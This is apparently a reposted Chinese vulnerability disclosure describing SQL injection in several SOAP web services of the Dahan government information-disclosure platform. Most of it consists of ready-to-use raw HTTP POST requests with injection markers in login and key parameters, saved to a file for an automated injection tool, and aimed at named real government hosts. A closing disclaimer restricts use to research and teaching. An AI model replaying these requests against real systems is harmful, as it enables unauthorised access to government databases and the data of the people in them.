大汉政府信息公开多处SQL注入

2020年1月1日03:24:03评论408 views字数 4846阅读16分9秒阅读模式

摘要

主要是webservice漏洞，漏洞存在于
1./xxgk/services/WSSync_xxgk?wsdl该WSSync_xxgk服务的多个方法，多个参数存在严重漏洞，且该漏洞普遍存在。
wsGetWeb
getClientIpAxis
wsGetColumn
wsGetColumnStyle
wsSynchronize
wsSynchronizeWithPath
wsSync
上述方法的多个参数均存在漏洞，随便选取一个方法进行测试

主要是webservice漏洞，漏洞存在于
1./xxgk/services/WSSync_xxgk?wsdl

该WSSync_xxgk服务的多个方法，多个参数存在严重漏洞，且该漏洞普遍存在。
wsGetWeb
getClientIpAxis
wsGetColumn
wsGetColumnStyle
wsSynchronize
wsSynchronizeWithPath
wsSync
上述方法的多个参数均存在漏洞，随便选取一个方法进行测试

/xxgk/services/WSSync_xxgk?wsdl wsGetColumn方法
用WSockExpert v0.7抓包，并保存为wooyun.txt

POST /xxgk/services/WSSync_xxgk?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.lyg.gov.cn Connection: Keep-Alive User-Agent: google robots  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms">    <soapenv:Header/>    <soapenv:Body>       <rec:wsGetColumn soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">          <strWebId xsi:type="xsd:string">1</strWebId>          <strLoginId xsi:type="xsd:string">1*</strLoginId>          <strPwd xsi:type="xsd:string">1</strPwd>          <strKey xsi:type="xsd:string">1</strKey>       </rec:wsGetColumn>    </soapenv:Body> </soapenv:Envelope>

2./xxgk/services/WSSynchronize?wsdl
WSSynchronize服务的多个方法，多个参数存在严重漏洞，且该漏洞普遍存在，如
wsGetWeb
wsGetColumnStyle
wsSynchronize
wsSynchronizeWithPath
上述方法的多个参数均存在漏洞，这里随便选取一个方法（wsSynchronize）进行测试
用WSockExpert v0.7抓包，并保存为wooyun.txt

POST /xxgk/services/WSSynchronize?wsdl HTTP/1.1  Accept-Encoding: gzip,deflate  Content-Type: text/xml;charset=UTF-8  SOAPAction: ""  Content-Length: 222  Host: xxgk.lyg.gov.cn  Connection: Close  User-Agent: google robots   <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.blf.jcms">   <soapenv:Header/>   <soapenv:Body>    <web:wsSynchronize soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">     <strXml xsi:type="xsd:string">1</strXml>      <strLoginId xsi:type="xsd:string">1*</strLoginId>      <strPwd xsi:type="xsd:string">1</strPwd>      <strKey xsi:type="xsd:string">1</strKey>      <hasZip xsi:type="xsd:string">1</hasZip>    </web:wsSynchronize>   </soapenv:Body>  </soapenv:Envelope>

3./xxgk/services/WSSmsSync?wsdl
WSSmsSync服务的多个方法，多个参数存在严重漏洞，且该漏洞普遍存在，如
isBase64
wsSyncGetInfos
wsSyncGetInfos
setStrAppId
setBase64

上述方法的多个参数均存在漏洞，这里随便选取一个方法（wsSyncGetInfos）进行测试
用WSockExpert v0.7抓包，并保存为wooyun.txt

POST /xxgk/services/WSSmsSync?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.yj.gov.cn Connection: Close User-Agent: google robots  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms">    <soapenv:Header/>    <soapenv:Body>       <rec:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">          <strLoginId xsi:type="xsd:string">1*</strLoginId>          <strPwd xsi:type="xsd:string">1</strPwd>          <beginTime xsi:type="xsd:string">1</beginTime>          <endTime xsi:type="xsd:string">?</endTime>          <maxId xsi:type="xsd:string">1</maxId>       </rec:wsSyncGetInfos>    </soapenv:Body> </soapenv:Envelope>

4./xxgk/services/WSSync_searchinfo
该WSSync_searchinfo服务的多个方法，多个参数存在严重漏洞，且该漏洞普遍存在，如
getClientIpAxis
wsTest
wsSyncGetInfos
setBase64
isBase64
setStrAppId
上述方法的多个参数均存在漏洞，这里随便选取一个方法进行测试

首先保存如下内容为wooyun.txt

POST /xxgk/services/WSSync_searchinfo HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.cqyc.gov.cn Connection: Close User-Agent: google robots  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.blf.jcms">    <soapenv:Header/>    <soapenv:Body>       <web:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">          <strLoginId xsi:type="xsd:string">1*</strLoginId>          <strPwd xsi:type="xsd:string">1</strPwd>          <strKey xsi:type="xsd:string">1</strKey>          <num xsi:type="xsd:string">1</num>          <maxId xsi:type="xsd:string">1</maxId>       </web:wsSyncGetInfos>    </soapenv:Body> </soapenv:Envelope>

5./xxgk/services/WSYsqgk?wsdl
该WSYsqgk服务的多个方法，多个参数存在严重漏洞，且该漏洞普遍存在，如
wsTest
getClientIpAxis
wsGetYsqgk

上述方法的多个参数均存在漏洞，这里随便选取一个方法进行测试
首先保存如下内容为wooyun.txt

POST /xxgk/services/WSYsqgk?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.yiyuan.gov.cn Connection: Close User-Agent: google robots  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms">    <soapenv:Header/>    <soapenv:Body>       <rec:wsGetYsqgk soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">          <strId xsi:type="xsd:string">1</strId>          <strLoginId xsi:type="xsd:string">2</strLoginId>          <strPwd xsi:type="xsd:string">3</strPwd>          <strKey xsi:type="xsd:string">4</strKey>       </rec:wsGetYsqgk>    </soapenv:Body> </soapenv:Envelope>

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

大汉政府信息公开多处SQL注入

微擎普通用户权限SQL注入漏洞

无需登录-悟空CRM 存储型XSS

cacti 0.8.8g cdef.php selected_items 存在sql注入

ZwelL通用图片上传漏洞

discuz某插件设计缺陷可前台getshell

Seacmsv6.25 two sql inject

深信服数据中心2.0某处存在命令执行漏洞

Z-blog前台无需登录包含漏洞一枚

发表评论

在线咨询

微信